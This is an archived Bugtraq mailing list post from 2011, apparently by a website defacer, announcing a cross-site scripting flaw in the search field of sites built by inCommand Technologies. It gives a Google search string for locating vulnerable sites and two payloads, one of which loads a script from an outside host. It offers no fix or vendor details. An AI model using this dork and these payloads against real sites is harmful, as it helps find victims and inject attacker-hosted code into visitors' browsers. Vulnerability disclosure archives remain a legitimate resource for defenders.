Bugtraq mailing list archives

inCommand Technologies, Inc. Cross-site Scripting Vulnerability

From: md.r00t.defacer () gmail com
Date: Fri, 21 Oct 2011 09:47:18 GMT

#------------In The Name Of God------------
#inCommand Technologies, Inc. Cross-site Scripting Vulnerability
###################################
#AUTHOR: md.r00t
#Mail: md.r00t.defacer () gmail com
#Website: www.r00t.gigfa.com
#Forum: http://ajaxtm.com/forum
###################################
#Google D0rk:
# "Website Design by inCommand Technologies, Inc."
###################################
# xss EXPLOIT:
<script>alert(/0/)</script>
<script src="http://md-r00t.persiangig.com/xpl/XSS1.JS";></script>
######VULN IN HERE##################
Vulnerabilities in the search field located ;)
####################################
#TNX:
#Ajax Security Team,Aria-Security Team (Persian Security Network),hadihadi & black.shadowes(Virangar Security Team)
***************************************

Current thread:

inCommand Technologies, Inc. Cross-site Scripting Vulnerability md . r00t . defacer (Oct 21)